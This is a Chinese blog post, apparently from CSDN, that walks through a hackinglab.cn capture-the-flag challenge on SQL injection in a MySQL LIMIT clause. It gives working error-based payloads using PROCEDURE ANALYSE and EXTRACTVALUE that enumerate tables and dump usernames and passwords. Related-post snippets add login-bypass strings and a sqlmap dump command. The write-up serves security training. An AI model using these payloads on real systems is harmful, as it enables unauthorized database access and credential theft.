hackinglab.cn 注入关之四

最新推荐文章于 2021-03-17 10:41:10 发布
最新推荐文章于 2021-03-17 10:41:10 发布
阅读量1.6k 收藏
点赞数 2
分类专栏: hackinglab.cn-题解
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kostart123/article/details/53670099
版权

题目:

小明经过学习,终于对SQL注入有了理解,她知道原来sql注入的发生根本原因还是数据和语句不能正确分离的原因,导致数据作为sql语句执行;但是是不是只要能够控制sql语句的一部分就能够来利用获取数据呢?小明经过思考知道,where条件可控的情况下,实在是太容易了,但是如果是在limit条件呢?

 


writeup:

写在前面:地址由于太长题目地址就用url代替。

点击题目进去, 地址为url?start=0&num=1.出现一句话。

  1. 随便几个数字测试start和num,发现num值不对结果产生干扰,尝试在num值后加单引号发现报错,如:‘0,1\’‘。可以看到单引号被过滤了,并且,start和num就是limit的两个参数.
  2. 尝试使用union注入: 
    url?start=0 union select 1%23&num=1
     会出现如下错误: 
    Incorrect usage of UNION and ORDER BY
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
    也就是说在limit语句前面还有order by语句,GG。
  3. union既然不行了那怎么办(注意注释符#可用)?上网查了一下mysql的select语法 
        SELECT 
    [ALL | DISTINCT | DISTINCTROW ]  
    [HIGH_PRIORITY]  
    [STRAIGHT_JOIN]  
    [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]  
    [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]  
    select_expr [, select_expr ...]  
    [FROM table_references  
    [WHERE where_condition]  
    [GROUP BY {col_name | expr | position}  
    [ASC | DESC], ... [WITH ROLLUP]]  
    [HAVING where_condition]  
    [ORDER BY {col_name | expr | position}  
    [ASC | DESC], ...]  
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]  
    [PROCEDURE procedure_name(argument_list)]  
    [INTO OUTFILE 'file_name' export_options  
    | INTO DUMPFILE 'file_name' 
    | INTO var_name [, var_name]]  
    [FOR UPDATE | LOCK IN SHARE MODE]]

     所以可以用procedure语句了。构造如下语句

    ?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)%23&num=1

    返回的结果为: 
    XPATH syntax error: 'article,user'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

    可以看到现在的数据库中有两个表:article和user。

     

  4. 现在爆破user表中的列(由于分号被过滤了,只能用16进制的ascii编码表示表名): 
    ?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(column_name) from information_schema.columns where table_name=0x75736572))),1)%23&num=1

     返回结果为: 
    XPATH syntax error: 'id,username,password,lastloginIP'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

    想想username中应该会有发现: 
    ?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(username) from user))),1)%23&num=1

    XPATH syntax error: 'user,admin,flag'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
    可以看到可疑值flag,再看看password列应该就会得到flag: 
    ?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(password) from user))),1)%23&num=1
      
    XPATH syntax error: 'user,admin,myflagishere'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
     

    果然flag为myflagishere。

 

写在后面:由于刚接触sql注入不久拿到这一题想了很久,在网上找了好多资料,最后才知道其实这是limit的注入参考了这篇文章http://netsecurity.51cto.com/art/201501/464519.htm.

r00tnb
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
alpine-apache2-reverse-proxy-forensicid-uniqueid:具有取证准备和示例后端服务的Alpine Linux Apache2反向代理
05-25
hackinglab / alpine-base:latest 规格 使用s6启动处理 动态创建用户 有或没有root和非root用户的已知密码 基于env的动态ctf标志处理 基于file的动态ctf标志处理 反向代理通过/ opt / www中的apache2提供文件 后端...
Hackinglab注入
weixin_30721899的博客
11-27 1402
基本做过忘记做记录。没事做做注入,做一下笔记。 1.最简单的SQL注入   Tips题目里有简单提示.页面如下图。 说了有提示,就看看源码。 payload :admin ' or 1=1# 2.最简单的SQL注入(熟悉注入环境) pyload: http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92...
HackingLab 注入
Galaxy_fan的博客
07-13 1405
$strsql="select * from `user` where userid=".intval($_GET['userid'])." and password='".md5($_GET['pwd'], true) ."'";
hackinglab.cn注入之六
r00tnb的博客
12-15 1329
题目: 本题目为手工注入学习题目,主要用于练习基于Mysql报错的手工注入。Sqlmap一定能跑出来,所以不必测试了。flag中不带key和# writeup: 题目上都说了是基于mysql报错的手工注入。 进入题目后返回如下界面; username:admin status:ok 直接加单引号返回: Warning: mysql_fetch_row() expects ...
网络安全攻防实验室通教程-注入
热门推荐
黑面狐
10-19 1万+
网络安全实验室传送门: 地址:http://hackinglab.cn  第一题:最简单的SQL注入 查看网页源码,获取到提示,要登录admin 所以构造用户名  admin' or 'a'='a'#   密码随便填, 获取到flag 第2题:最简单的sql注入(熟悉环境) 查看网页源码获得提示参数id=1  是数字型注入 于是构造url    index.
hackinglab注入WP(二)
Yale的博客
04-07 1547
HACKLAB注入(http://www.tuicool.com/articles/nMrqeay) 4.到底能不能回显 构造这个语句 ?start=0 procedure analyse(extractvalue(rand(),concat(1, 得到结果 XPATH syntax error: 'article,user'   知道现在的数据库中有两个表:article和user
注入所有php页面 $md5,每天一道CTF(9) Hackinglab 注入
weixin_34320235的博客
03-17 169
万能密码题目中有提示,打开源码发现。万能密码 用户名 admin' or 1=1#密码任意过之。2-最简单的SQL注入(熟悉注入环境)UNION注入.根据源码Tip,在URL尾部加上 ?id=2,显示出第二篇文章。加上 AND 1=1和 AND 1=2发现输出不同,判断存在注入。在其后加入 OR 1=1爆出所有的文章,得到flag。3-防注入宽字节注入。各种尝试,在参...
C++中函数调用时的三种参数传递方式详解
qq_23923713的博客
11-28 338
原文地址:https://blog.csdn.net/ccblogger/article/details/77752659?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.control&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.co
hackinglab.cn 注入之一
r00tnb的博客
12-15 3760
题目: Tips题目里有简单提示. writeup: 第一应该挺简单的。 点击题目地址进去,显示的是一个简单的登陆界面,还有一个验证码。 查看一下源代码,发现有一个提示: <!-- Tips login as admin--> 也就是说登录名已经告诉你了。 开始填写表单,登录名就写admin,密码随便填,验证码输入正确,等待返回结果是登录失败!预料之中,在登录名...
hackinglab注入WP
Yale的博客
04-06 793
1.简单的SQL注入 源码有提示: 用admin登录,明摆着告诉我们用万能密码啊username:admin' or 1=1# password:任意一定要填对验证码 就得到key了2.最简单的SQL注入(熟悉注入环境) 又有提示 开始构造php?id=1 1' 1 or 1得到key3.防注入 需要用到limit,or,宽字符 ?id=1' or 1=1
hackinglab.cn注入之三
r00tnb的博客
12-15 1861
题目: 小明终于知道,原来黑客如此的吊,还有sql注入这种高端技术,因此他开始学习防注入!(flag是随机序列) writeup: 点击题目地址进去,发现一段话。 查看源代码,发现提示: <!-- tips: id=1 构造id参数的查询语句,各种试id的值,发现结果只有一句话和空白页两种情况。然后添加单引号发现返回空白页。 由于加单引号会出现空白页,没有报错,尝试宽字...
hackinglab.cn 注入之二
r00tnb的博客
12-15 1617
题目: 最简单的SQL注入。 writeup: 点击题目地址可以看到一句没什么用的话。 一般提示应该在源代码中,果然: <!-- tips: id=1 在url后加?id=1连接后看结果,发现还是刚才那句话。改变id的数值试试,发现会有空白页的情况,在换成字符串试试(不要加引号)会有一个警告: Warning: mysql_fetch_row() expects pa...
hackinglab-注入-第1题
u012851380的博客
11-20 855
输入用户名、密码为admin’ or ‘1’='1 flag出现
网络安全实验室 注入writeup
03-12 410
URL:http://hackinglab.cn 注入 [1] 最简单的SQL注入username = admin' or ''='password随便什么都可以直接可以登录 [2] 熟悉注入环境username = admin or 1=1 password 随便什么 [3] 防注入根据响应头中返回的 charset=gb2312 ,猜测可能是一个宽字节注入,通过验证后开始正...
HackingLab 注入第7题
11-19 154
HackingLab 注入第7题通过时间注入,获得了一些信息,但在填入FLAG值时都不正确,以下为结果,供大家参考 sqlmap -u "http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin" --dump -C "motto" -T "motto" -D "mydbs" 通过sqlmap获得了,数据库为mydbs,表有3个 log()、motto(id,motto,usirnam
hackinglab.cn脚本之一
r00tnb的博客
12-17 1646
题目: 小明这次哭了,key又找不到了!!!key啊,你究竟藏到了哪里,为什么我看到的页面上都没有啊!!!!!! writeup: 点击进去出现:_到这里找key__ 这是一个链接,再次点击:想找key,从哪里来回哪里去,我这里没有key!哼! 看来不在这,查看一下第一次网页的源代码: _到这里找key__
网络信息安全学习平台---注入第7题
幽狼传说
06-21 3013
网络信息安全学习平台网址:http://hackinglab.cn/ sql盲注:题目内容见平台上的第7题 我主要使用的基于时间的盲注,其它类型的盲注可自行测试 1、首先要确定数据库名的长度 输入 http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin'  and
hackinglab 脚本 15 Principle很重要的XSS
Jacob12774的博客
12-03 690
这一提示: 如果实在做不出来了,可能是思路被局限,可以参考一下这里: Principle: 对于黑盒XSS,首先要知道在哪里过滤的,过滤了什么,如何过滤的,什么情况下触发过滤 即Where/What/How/When 之后你便可以建立自己的Fuzz Testing Libs 接下来便分享下我的思路 我们先输入 javascript:alert(1) 结果可想而知,肯定是被屏蔽(此处屏蔽指...
网络信息安全攻防学习平台HackingLab 综合(第二题)
江湖
01-12 5633
没有注入到底能不能绕过登录 分值: 350 不是SQL注入地址 题目打开后显示 Login Burte Force,想着是爆破,随便拿了个字典跑了跑没结果,扫了下有个弱口令test:test。 显示key在admin界面,御剑扫了下后台admin也没结果,不过发现了robots.txt(御剑字典要把这个加进去,很常见)。 User-agent: * Disallo
http://hackinglab.cn/index.php
最新发布
03-16
您好,http://hackinglab.cn/index.php 是一个网络安全实验室的网站,提供了各种网络安全实验和挑战,旨在帮助人们学习和提高网络安全技能。该网站还提供了一些网络安全工具和资源,供用户下载和使用。如果您对网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值